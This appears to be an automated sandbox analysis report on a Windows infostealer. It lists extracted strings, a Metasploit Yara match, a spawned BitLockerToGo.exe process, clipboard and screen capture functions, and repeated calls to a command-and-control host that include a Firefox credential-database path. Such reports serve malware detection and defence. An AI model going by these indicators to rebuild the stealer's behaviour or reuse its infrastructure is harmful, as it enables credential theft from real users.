              Source: file.exeString found in binary or memory: https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal
              Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exeString found in binary or memory: https://gallery.azure.com/https://graph.windows.net/mariadb.database.azure.comhttps://storage.azure.
              Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exeString found in binary or memory: https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin
              Source: file.exeString found in binary or memory: https://manage.windowsazure.com/publishsettings/indexnon-CONNECT
              Source: file.exeString found in binary or memory: https://manage.windowsazure.us/publishsettings/indexMaximum
              Source: file.exeString found in binary or memory: https://management.azure.com/https://managedhsm.azure.net/https://servicebus.azure.net/https://datab
              Source: file.exeString found in binary or memory: https://management.azure.comINVALID
              Source: file.exeString found in binary or memory: https://management.chinacloudapi.cntoo
              Source: file.exeString found in binary or memory: https://management.core.usgovcloudapi.net/https://dev.azuresynapse.usgovcloudapi.netbad
              Source: file.exeString found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictLZMA
              Source: BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/
              Source: BitLockerToGo.exe, 00000005.00000003.2470403875.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/&6
              Source: BitLockerToGo.exe, 00000005.00000003.2462485236.0000000002F41000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/0
              Source: BitLockerToGo.exe, 00000005.00000003.2470403875.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/?6a
              Source: BitLockerToGo.exe, 00000005.00000003.2398142344.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397680492.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2398470292.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397264679.0000000002F11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/D7
              Source: BitLockerToGo.exe, 00000005.00000003.2462610333.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2531513795.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/api
              Source: BitLockerToGo.exe, 00000005.00000003.2462610333.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/apiT
              Source: BitLockerToGo.exe, 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/apiar
              Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/apihort
              Source: BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2398248173.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/apii
              Source: BitLockerToGo.exe, 00000005.00000003.2470610228.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419422712.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462610333.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/apizen
              Source: BitLockerToGo.exe, 00000005.00000003.2420113247.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418852252.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/w6
              Source: BitLockerToGo.exe, 00000005.00000003.2398142344.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397680492.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397264679.0000000002F11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/y7
              Source: BitLockerToGo.exe, 00000005.00000003.2420113247.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418852252.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/~6
              Source: BitLockerToGo.exe, 00000005.00000003.2531309021.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2420113247.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2463146392.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2532039828.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2483801676.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418852252.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2470403875.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2483094012.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop:443/api
              Source: BitLockerToGo.exe, 00000005.00000003.2531309021.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2532039828.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop:443/api-release/key4.dbPK
              Source: BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop:443/apirosoft
              Source: BitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exeString found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comjson:
              Source: file.exeString found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
              Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: BitLockerToGo.exe, 00000005.00000003.2462415774.000000000526A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: BitLockerToGo.exe, 00000005.00000003.2462415774.000000000526A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: BitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: BitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: BitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D1E8E0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_02D1E8E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D1E8E0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_02D1E8E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D1F713 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,5_2_02D1F713

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.2354687188.000000C000326000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D103525_2_02D10352
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02CF17505_2_02CF1750
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D10AD05_2_02D10AD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02CF4BB05_2_02CF4BB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02CF33905_2_02CF3390
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D153B05_2_02D153B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02CF41C05_2_02CF41C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02CF81605_2_02CF8160
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D1863B5_2_02D1863B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D276205_2_02D27620
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02CF37805_2_02CF3780
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02CF57605_2_02CF5760
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02CF64E05_2_02CF64E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D1BBF25_2_02D1BBF2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D17B8C5_2_02D17B8C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02CF6B005_2_02CF6B00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D15F0E5_2_02D15F0E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D2C9C05_2_02D2C9C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D249C05_2_02D249C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D11FA15_2_02D11FA1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D0CCF05_2_02D0CCF0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02CFFDE05_2_02CFFDE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D2CD005_2_02D2CD00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D18D3B5_2_02D18D3B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02CF8B40 appears 64 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02CF9430 appears 186 times
              Source: file.exeStatic PE information: Number of sections : 12 > 10
              Source: file.exe, 00000000.00000002.2357283198.00007FF67A133000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs file.exe
              Source: file.exe, 00000000.00000002.2354687188.000000C0002EC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
              Source: file.exe, 00000000.00000002.2354687188.000000C0001D7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
              Source: file.exe, 00000000.00000002.2354687188.000000C000212000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
              Source: file.exe, 00000000.00000003.2342735024.000001E6FBA50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
              Source: file.exeBinary or memory string: OriginalFileName vs file.exe
              Source: 00000000.00000002.2354687188.000000C000326000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D1D4D1 CoCreateInstance,5_2_02D1D4D1
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Libraries\lhlip.scifJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\system32\2bac949abffefe65784249a736b77326ada5ae81bd7dd8b644174f400402909eAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 34%
              Source: file.exeVirustotal: Detection: 37%
              Source: file.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
              Source: file.exeString found in binary or memory: failed to construct HKDF label: %scrypto/rsa: missing public moduluscrypto/des: invalid buffer overlapinvalid nested repetition operatorinvalid or unsupported Perl syntaxcrypto/rc4: invalid buffer overlapGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizebad tag in lazy extension decodingmismatching field: got %v, want %vlzma: wrong uncompressed data size" is unexported but missing PkgPathreflect.MakeSlice of non-slice typecrypto/md5: invalid hash state sizeencoding/hex: odd length hex string2006-01-02T15:04:05.999999999Z07:00SubscribeServiceChangeNotificationsCOFF symbols count is absurdly highnot a PE file, smaller than tiny PE` SizeOfRawData is larger than filenetwork dropped connection on resettransport endpoint is not connected1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=file type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativepostgres.database.usgovcloudapi.nethttps://database.usgovcloudapi.net/unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKhttps://management.chinacloudapi.cntoo many Questions to pack (>65535)transform: short destination buffer'_' must separate successive digitsbigmod: modulus is smaller than natmime: bogus characters after %%: %qhash/crc32: invalid hash state sizeflate: corrupt input before offset P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitydelimiters may only be "{}" or "<>"file %q has a name conflict over %vchacha20: output smaller than inputstring field contains invalid UTF-8%v already implements proto.Messagelzma: unsupported chunk header byteop is neither a match nor a literalnewRangeDecoder: d.code >= d.nrange%d extra bits on block, should be 0zero matchoff and matchlen (%d) > 0truncated input (or invalid offset)crypto/cipher: input not full blocksmethod ABI and value ABI don't alignTime.UnmarshalBinary: invalid lengthstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point support6ba7b810-9dad-11d1-80b4-00c04fd430c86ba7b811-9dad-11d1-80b4-00c04fd430c86ba7b812-9dad-11d1-80b4-00c04fd430c86ba7b814-9dad-11d1-80b4-00c04fd430c8accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called w
              Source: file.exeString found in binary or memory: failed to construct HKDF label: %scrypto/rsa: missing public moduluscrypto/des: invalid buffer overlapinvalid nested repetition operatorinvalid or unsupported Perl syntaxcrypto/rc4: invalid buffer overlapGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizebad tag in lazy extension decodingmismatching field: got %v, want %vlzma: wrong uncompressed data size" is unexported but missing PkgPathreflect.MakeSlice of non-slice typecrypto/md5: invalid hash state sizeencoding/hex: odd length hex string2006-01-02T15:04:05.999999999Z07:00SubscribeServiceChangeNotificationsCOFF symbols count is absurdly highnot a PE file, smaller than tiny PE` SizeOfRawData is larger than filenetwork dropped connection on resettransport endpoint is not connected1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=file type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativepostgres.database.usgovcloudapi.nethttps://database.usgovcloudapi.net/unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKhttps://management.chinacloudapi.cntoo many Questions to pack (>65535)transform: short destination buffer'_' must separate successive digitsbigmod: modulus is smaller than natmime: bogus characters after %%: %qhash/crc32: invalid hash state sizeflate: corrupt input before offset P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitydelimiters may only be "{}" or "<>"file %q has a name conflict over %vchacha20: output smaller than inputstring field contains invalid UTF-8%v already implements proto.Messagelzma: unsupported chunk header byteop is neither a match nor a literalnewRangeDecoder: d.code >= d.nrange%d extra bits on block, should be 0zero matchoff and matchlen (%d) > 0truncated input (or invalid offset)crypto/cipher: input not full blocksmethod ABI and value ABI don't alignTime.UnmarshalBinary: invalid lengthstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point support6ba7b810-9dad-11d1-80b4-00c04fd430c86ba7b811-9dad-11d1-80b4-00c04fd430c86ba7b812-9dad-11d1-80b4-00c04fd430c86ba7b814-9dad-11d1-80b4-00c04fd430c8accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called w
              Source: file.exeString found in binary or memory: net/addrselect.go
              Source: file.exeString found in binary or memory: github.com/saferwall/pe@v1.4.8/loadconfig.go
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
